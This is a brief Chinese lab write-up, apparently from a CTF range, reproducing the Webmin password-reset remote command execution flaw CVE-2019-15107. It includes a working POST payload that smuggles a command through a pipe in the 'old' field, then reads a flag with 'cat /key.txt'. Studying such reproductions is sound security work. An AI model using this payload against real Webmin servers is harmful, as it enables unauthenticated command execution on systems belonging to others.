Webmin远程命令执行漏洞(CVE-2019-15107)复现
前言
Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。
复现

进入靶场之后是一个登陆界面,直接通过查看该CVE漏洞的信息发现该漏洞出现在更改密码界面,以及Poc
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
其中id位置就是我们命令执行植入命令的地方
我们查看post请求的数据包

需要更改的就是红框中的两个部分

改成如下之后发送

成功执行命令,并且key.txt就在目录下面。
我么直接cat /key.txt

或者使用hackbar





